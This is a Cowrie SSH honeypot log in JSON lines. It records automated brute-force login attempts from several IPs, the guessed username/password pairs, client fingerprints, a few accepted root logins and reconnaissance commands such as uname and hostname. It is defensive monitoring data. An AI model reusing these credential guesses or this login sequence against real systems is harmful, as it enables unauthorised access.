{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:20:27.299329Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021981","message":"login attempt [admin/01021981] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:27.608595Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021976","message":"login attempt [admin/01021976] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:28.670138Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01011964","message":"login attempt [admin/01011964] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:29.732312Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0077","message":"login attempt [admin/0077] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:30.794025Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"zzz123","message":"login attempt [admin/zzz123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:31.856044Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:32.917072Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59676,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ebe5e5eba1","protocol":"ssh","message":"New connection: 41.226.27.251:59676 (1.2.3.4:22) [session: 01ebe5e5eba1]","sensor":"my-vps","timestamp":"2025-08-31T02:20:35.058105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:35.059568Z","src_ip":"41.226.27.251","session":"01ebe5e5eba1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:20:35.109519Z","src_ip":"41.226.27.251","session":"01ebe5e5eba1"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:35.259338Z","src_ip":"41.226.27.251","session":"01ebe5e5eba1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:36.521826Z","src_ip":"41.226.27.251","session":"01ebe5e5eba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42748,"dst_ip":"1.2.3.4","dst_port":22,"session":"712ca449afc7","protocol":"ssh","message":"New connection: 212.227.125.160:42748 (1.2.3.4:22) [session: 712ca449afc7]","sensor":"my-vps","timestamp":"2025-08-31T02:20:52.213707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:53.227137Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:20:53.228267Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46908,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2dc9de4ec08","protocol":"ssh","message":"New connection: 41.226.27.251:46908 (1.2.3.4:22) [session: e2dc9de4ec08]","sensor":"my-vps","timestamp":"2025-08-31T02:20:55.719897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:55.720549Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:20:55.763741Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:20:55.893776Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:20:56.001571Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:20:56.002403Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:56.046950Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:56.048091Z","src_ip":"41.226.27.251","session":"e2dc9de4ec08"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.230.226","src_port":39332,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe817fd1a0ff","protocol":"ssh","message":"New connection: 116.198.230.226:39332 (1.2.3.4:22) [session: fe817fd1a0ff]","sensor":"my-vps","timestamp":"2025-08-31T02:20:57.138297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:57.139157Z","src_ip":"116.198.230.226","session":"fe817fd1a0ff"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:20:57.332820Z","src_ip":"116.198.230.226","session":"fe817fd1a0ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45220,"dst_ip":"1.2.3.4","dst_port":22,"session":"646d3a207d7a","protocol":"ssh","message":"New connection: 212.227.125.160:45220 (1.2.3.4:22) [session: 646d3a207d7a]","sensor":"my-vps","timestamp":"2025-08-31T02:20:57.412958Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40580,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa3f487bac5f","protocol":"ssh","message":"New connection: 212.227.235.229:40580 (1.2.3.4:22) [session: fa3f487bac5f]","sensor":"my-vps","timestamp":"2025-08-31T02:20:58.534605Z"}
{"eventid":"cowrie.login.success","username":"root","password":"002664530","message":"login attempt [root/002664530] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:20:58.762348Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:59.289268Z","src_ip":"212.227.235.229","session":"fa3f487bac5f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:20:59.289948Z","src_ip":"212.227.235.229","session":"fa3f487bac5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:21:02.295122Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:21:02.295806Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:03.347997Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:03.349359Z","src_ip":"212.227.125.160","session":"712ca449afc7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:04.825603Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:04.826289Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:05.139008Z","src_ip":"116.198.230.226","session":"fe817fd1a0ff"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456789","message":"login attempt [elasticsearch/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:21:05.536552Z","src_ip":"212.227.235.229","session":"fa3f487bac5f"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:07.420058Z","src_ip":"212.227.235.229","session":"fa3f487bac5f"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":60028,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b3cf18e2d4d","protocol":"ssh","message":"New connection: 201.148.180.50:60028 (1.2.3.4:22) [session: 6b3cf18e2d4d]","sensor":"my-vps","timestamp":"2025-08-31T02:21:11.373989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:11.616855Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:11.618489Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.login.success","username":"root","password":"002664530","message":"login attempt [root/002664530] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:21:16.121840Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33466,"dst_ip":"1.2.3.4","dst_port":22,"session":"f431073e3270","protocol":"ssh","message":"New connection: 41.226.27.251:33466 (1.2.3.4:22) [session: f431073e3270]","sensor":"my-vps","timestamp":"2025-08-31T02:21:16.310764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:16.311692Z","src_ip":"41.226.27.251","session":"f431073e3270"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:16.355806Z","src_ip":"41.226.27.251","session":"f431073e3270"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:21:16.488672Z","src_ip":"41.226.27.251","session":"f431073e3270"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:17.729469Z","src_ip":"41.226.27.251","session":"f431073e3270"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:21:19.598062Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T02:21:19.598791Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59276,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f5037bc1524","protocol":"ssh","message":"New connection: 212.227.125.160:59276 (1.2.3.4:22) [session: 3f5037bc1524]","sensor":"my-vps","timestamp":"2025-08-31T02:21:20.157666Z"}
